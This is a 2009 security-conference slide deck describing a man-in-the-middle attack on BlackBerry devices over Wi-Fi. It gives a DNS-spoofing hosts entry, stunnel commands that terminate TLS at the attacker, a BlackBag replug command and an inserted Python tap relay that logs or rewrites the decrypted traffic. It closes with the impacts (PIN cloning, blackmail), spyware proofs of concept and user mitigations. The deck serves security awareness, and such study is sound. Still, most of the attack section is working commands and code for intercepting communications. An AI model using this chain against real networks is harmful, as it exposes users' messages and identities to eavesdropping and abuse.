Attacking Blackberry For Phun and Profit


Page 1: Attacking Blackberry For Phun and Profit

Attacking BlackBerry for phun and profit

y3dips[et]echo.or.id

Sunday, November 8, 2009

Page 2: Attacking Blackberry For Phun and Profit

y3dips

• A bandwidth hunter ... a renegade

• IT security fan for more than 7 years

• http://google.com/search?q=y3dips


Page 3: Attacking Blackberry For Phun and Profit

BlackBerry

• Push Email

• Wireless Messaging System

• Phone, SMS, Cameras, Browsing


Page 4: Attacking Blackberry For Phun and Profit

BlackBerry

• Photos

• Emails

• SMS

• Phone log

• Contacts

Page 5: Attacking Blackberry For Phun and Profit

BlackBerry

• BlackBerry Enterprise Server (BES)

• BlackBerry Internet Service (BIS)


Page 6: Attacking Blackberry For Phun and Profit

Diagram

http://smartphone.nttdocomo.co.jp/english/blackberrybold/blackberryservice/img/index/dgm_diagram.gif


Page 7: Attacking Blackberry For Phun and Profit

BB Proxy

• Attacks the BES network

• Presented at DEF CON 14 (2006) by Jesse D'Aguanno

• Uses a BlackBerry device as a gateway into the internal network

Page 8: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram: the attacker sits on the INTERNET; behind the firewall, on the INTERNAL LAN, are the BB user, the apps server and a server.

Page 9: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram (same layout: attacker on the INTERNET, firewall, BB user / apps server / server on the INTERNAL LAN).

Step 1: the BB user's device connects out to the attacker's computer.

Page 10: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram (same layout: attacker on the INTERNET, firewall, BB user / apps server / server on the INTERNAL LAN).

Step 1: the device connects out to the attacker's computer.

Step 2: through the device, the attacker connects to the app server.

Page 11: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram (same layout: attacker on the INTERNET, firewall, BB user / apps server / server on the INTERNAL LAN).

Step 1: the device connects out to the attacker's computer.

Step 2: through the device, the attacker connects to the app server.

Result: the attacker 0wned the internal network; the device acts as a proxy.

Page 12: Attacking Blackberry For Phun and Profit

Our Approach

• Attack the Wi-Fi network

• DNS spoofing

• SSL tunnelling with stunnel - http://stunnel.org

• BlackBag (Matasano's BlackBerry toolkit) - http://matasano.com

Page 13: Attacking Blackberry For Phun and Profit

DNS Spoofing

• Spoof the DNS entry on the router / DNS server so the device resolves the RIM relay host to the attacker's address

# echo "133.7.133.7 rcp.ap.blackberry.com" >> /etc/hosts

Page 14: Attacking Blackberry For Phun and Profit

DNS Spoofing


Page 15: Attacking Blackberry For Phun and Profit

Stunnel

• Set up two SSL connections

• SSL connection from the BB device to the attacker machine

• SSL connection from the attacker machine to the real BB (RIM) server

Page 16: Attacking Blackberry For Phun and Profit

Stunnel

• Set up two SSL connections (stunnel 3.x command-line syntax; stunnel 4 and later take the same settings from a config file)

# stunnel -d 443 -r localhost:8888

Server side: accept SSL from the device on tcp/443 and hand the decrypted stream to localhost:8888.

# stunnel -c -d 8889 -r 216.9.240.88:443

Client side: accept plaintext on localhost:8889 and open an SSL connection to the real RIM server at 216.9.240.88:443.

Page 17: Attacking Blackberry For Phun and Profit

BlackBag

• Glue the tunnel back: with the port layout above, replug bridges the plaintext side of the two stunnel instances (tcp/8888 on the device side, localhost:8889 on the RIM side), so the attacker sees the relay traffic in the clear

# bkb replug -b localhost:8889@8888
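The glue step in working code, as an added example that is not from the original talk or from Matasano's BlackBag: a minimal TCP tap relay in Python that plays the role the slides give to bkb replug, sitting between the plaintext ends of the two stunnel instances and handing every chunk to a tap callback before forwarding it. Everything below is constructed for the demo: the echo "upstream" stands in for the stunnel client end, the sample bytes are not real BlackBerry relay traffic, and the loopback ports are chosen by the OS rather than being 8888/8889.

```python
"""Added example: a tap relay that glues two plaintext tunnel ends together.

Assumed layout (port numbers as on the slides):
  device --TLS--> stunnel server (tcp/443) --plain--> this relay (tcp/8888)
  this relay --plain--> stunnel client (tcp/8889) --TLS--> RIM relay (tcp/443)
The demo uses loopback sockets instead of stunnel so it runs offline.
"""
import socket
import threading
from typing import Callable, List, Tuple

Tap = Callable[[str, bytes], None]

# Constructed sample payload for the demo (not real BlackBerry relay traffic).
SAMPLE = b"CONSTRUCTED-SAMPLE: sender=00000000 recipient=00000000\n"


def pump(src: socket.socket, dst: socket.socket, direction: str, tap: Tap) -> None:
    """Copy bytes src -> dst until EOF, handing each chunk to tap() first."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            tap(direction, data)          # observe (or rewrite) before forwarding
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF to the other end
        except OSError:
            pass


class TapRelay:
    """Listen on `listen`, connect each client to `upstream`, relay both ways."""

    def __init__(self, upstream: Tuple[str, int], tap: Tap,
                 listen: Tuple[str, int] = ("127.0.0.1", 0)) -> None:
        self.upstream, self.tap = upstream, tap
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(listen)
        self.sock.listen(5)
        self.address = self.sock.getsockname()  # (host, port) actually bound
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:                     # listening socket was closed
                return
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client: socket.socket) -> None:
        try:
            server = socket.create_connection(self.upstream)
        except OSError:
            client.close()
            return
        back = threading.Thread(target=pump, args=(server, client, "server->device", self.tap), daemon=True)
        back.start()
        pump(client, server, "device->server", self.tap)
        back.join()
        client.close()
        server.close()

    def close(self) -> None:
        self.sock.close()


def start_echo_upstream() -> Tuple[str, int]:
    """Stand-in for the stunnel client end: echoes one connection back, then exits."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run() -> None:
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()


def joined(captured: List[Tuple[str, bytes]], direction: str) -> bytes:
    """Reassemble everything the tap saw in one direction."""
    return b"".join(chunk for d, chunk in captured if d == direction)


def demo() -> Tuple[List[Tuple[str, bytes]], bytes]:
    """Run device -> relay -> upstream on loopback; return (tap log, echoed bytes)."""
    captured: List[Tuple[str, bytes]] = []
    relay = TapRelay(start_echo_upstream(), lambda d, b: captured.append((d, b)))
    try:
        with socket.create_connection(relay.address) as device:
            device.sendall(SAMPLE)
            device.shutdown(socket.SHUT_WR)
            got = b""
            while True:
                chunk = device.recv(4096)
                if not chunk:
                    break
                got += chunk
    finally:
        relay.close()
    return captured, got


if __name__ == "__main__":
    for direction, chunk in demo()[0]:
        print(direction, len(chunk), "bytes:", chunk.hex())
```

The tap callback is the point where the clear-text relay headers the later slides describe would be logged or rewritten; because both stunnel instances terminate TLS, this relay only ever sees plaintext.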

Page 18: Attacking Blackberry For Phun and Profit

BlackBag


Page 19: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram: the device on WIFI asks the DNS server for rcp.ap.blackberry.com; the legitimate answer is 216.9.240.88 in the RIM network. The attacker is at 133.7.133.7.

Page 20: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram: the device on WIFI asks the DNS server for rcp.ap.blackberry.com and receives the spoofed answer 133.7.133.7 (the attacker) instead of the real 216.9.240.88 in the RIM network.

Page 21: Attacking Blackberry For Phun and Profit

Attacking Anatomy

Diagram: the device on WIFI resolves rcp.ap.blackberry.com to the spoofed 133.7.133.7 instead of 216.9.240.88. Traffic flow: device -> attacker tcp/443 (stunnel server) -> tcp/8888 -> bkb replug -> tcp/8889 (stunnel client) -> rcp.ap.blackberry.com 216.9.240.88 tcp/443 in the RIM network.

Page 22: Attacking Blackberry For Phun and Profit

Viewable


Page 23: Attacking Blackberry For Phun and Profit

Viewable


Page 24: Attacking Blackberry For Phun and Profit

Result


Page 25: Attacking Blackberry For Phun and Profit

Result

• Clear-text sender PIN

• Clear-text recipient PIN

• Clear-text message type

• Encrypted data

Page 26: Attacking Blackberry For Phun and Profit

Impact

• Spam, up to DDoS

• PIN abuse, such as cloning

• Blackmail; identity theft; logs

• Email-to-PIN mapping

Page 27: Attacking Blackberry For Phun and Profit

Next

• More data to analyze (different types)

• Attack the encryption?

• Another infrastructure attack scenario

Page 28: Attacking Blackberry For Phun and Profit

Confession


Page 29: Attacking Blackberry For Phun and Profit

Raw Data


Page 30: Attacking Blackberry For Phun and Profit

Mal(Spy)ware

• The most famous case: the Etisalat issue

• Delivered as a firmware update

• Reverse-engineered by researchers

• 100% spyware

Page 31: Attacking Blackberry For Phun and Profit

Mal(Spy)ware


Page 32: Attacking Blackberry For Phun and Profit

POC

• Provided by Sheran Gunasekera @ HITB 2009

• Bugs - forwards emails

• PhoneSnoop - turns your BB into a spying device

• http://chirashi.zensay.com

Page 33: Attacking Blackberry For Phun and Profit

Bugs


Page 34: Attacking Blackberry For Phun and Profit

Summary

• 0wned a BlackBerry with $20 (USD)

• Social engineering rulez!

• BlackBerry user awareness

Page 35: Attacking Blackberry For Phun and Profit

Case Stories


Page 36: Attacking Blackberry For Phun and Profit

Case Stories


Page 37: Attacking Blackberry For Phun and Profit

Case Stories


Page 38: Attacking Blackberry For Phun and Profit

Mitigation

• Password-protect your device

• Turn on the firewall

• Encrypt your data / media card

• Control downloaded applications

• Protect your GPS location

• Connect only to legitimate Wi-Fi networks

Page 39: Attacking Blackberry For Phun and Profit

References

• Attack Surface Analysis of BlackBerry Devices - Symantec

• BlackBerry: Call to Arms, Some Provided - FtR & FX of Phenoelit

• BlackJacking: 0wning the Enterprise via BlackBerry - x30n (Jesse D'Aguanno)

• Bugs & Kisses: Spying on BlackBerry Users for Fun - Sheran Gunasekera

• Seberapa Amankah Infrastruktur WIFI BlackBerry device anda (How secure is your BlackBerry device's Wi-Fi infrastructure?) - y3dips & chopstick

Page 40: Attacking Blackberry For Phun and Profit

Greetz

• Hermis Consulting

• Sheran Gunasekera

• Info Komputer